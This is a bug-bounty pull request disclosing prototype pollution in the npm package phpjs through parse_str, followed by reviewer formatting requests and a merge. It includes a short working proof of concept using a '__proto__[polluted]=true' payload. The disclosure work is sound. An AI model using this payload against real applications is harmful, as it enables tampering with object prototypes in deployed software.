### PR TITLE
Prototype Pollution in phpjs

### PR DESCRIPTION
**Pull request by d3m0n-r00t**
## ✍️ Description
```phpjs``` is a community build php binding in javasciript.
This package is vulnearble to ```prototype pollution``` via ```parse_str```. 

## 🕵️‍♂️ Proof of Concept
Poc code. 
```
const phpjs = require('phpjs');
phpjs.parse_str("__proto__[polluted]=true",{}); 
console.log(polluted);
```
poc

## ☎️ Contact

*

## ✅ Checklist
**In my pull request, I have:**

- [x] _Created and populated the `README.md` and `vulnerability.json` files_
- [x] _Provided the repository URL and any applicable [permalinks]([https://help.github.com/en/github/managing-files-in-a-repository/getting-permanent-links-to-files](https://help.github.com/en/github/managing-files-in-a-repository/getting-permanent-links-to-files))_
- [x] _Defined all the applicable weaknesses ([CWEs]([https://cwe.mitre.org/](https://cwe.mitre.org/)))_
- [x] _Proposed the CVSS vector items i.e. User Interaction, Attack Complexity_
- [x] _Checked that the vulnerability affects the latest version of the package released_
- [x] _Checked that a fix does not currently exist that remediates this vulnerability_
- [x] _Complied with all applicable laws_

### CODE REVIEW

File: bounties/npm/phpjs/1/vulnerability.json [hunk 1]
```diff
@@ -0,0 +1,48 @@
+{
+	"PackageVulnerabilityID": 1,
+	"DisclosureDate": "2020-08-20",
+	"AffectedVersionRange": "*",
+	"Summary": "Prototype Pollution",
+	"Author": {
```
Comment (JamieSlome) [inline bounties/npm/phpjs/1/vulnerability.json:6]: @d3m0n-r00t - this should follow the format shown on https://github.com/418sec/huntr/tree/master/bounties.

Can you swap out the `Author` object for `Contributor` and insert your GitHub name into the `Discloser` section?

**Review by JamieSlome — CHANGES_REQUESTED** [review]

File: bounties/npm/phpjs/1/vulnerability.json (hunk 1 above)
Comment (d3m0n-r00t) [reply bounties/npm/phpjs/1/vulnerability.json]: @JamieSlome. I have added the requested changes. Sorry I didnt note the change. I was following the previous template.

**Comment by d3m0n-r00t** [comment]
Hi @mufeedvh, I have made the changes you requested. Thanks

**Review by Mik317 — APPROVED** [review]
LGTM :smile: :tada:

Screenshot from 2020-08-25 09-39-39

Cheers,
Mik

**Pull request merged**